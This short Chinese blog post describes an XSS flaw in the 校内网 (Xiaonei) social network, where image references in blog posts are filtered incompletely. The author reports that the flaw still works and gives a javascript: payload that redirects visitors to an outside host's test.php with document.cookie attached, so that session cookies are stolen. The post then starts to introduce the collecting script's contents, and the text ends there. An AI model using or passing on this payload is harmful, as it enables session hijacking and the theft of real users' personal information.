校内网XSS漏洞

昨晚丰发消息来说校内出现了XSS漏洞，但是接到群里大部分人说校内昨日下午服务器一直在维护中，我怀疑与此漏洞有关，于是没有测试。

今天下午刚好没事做，来测试下是否修复了，没想到还能利用。

校内网日志发布里面因为网络引用图片代码过滤不完全导致
植入恶意代码可窃取用Cookie 导致个人信息泄露
以下为利用代码 在打开日至的之后隐藏打开test.php
[quote]javascript:window.location.href='http://xxxxx/test.php?cookie='+document.cookie
[/quote]

在BLOG图片引用一个url test.php 作用是用来窃取用户的cookie
Test.php内容以下
[quote]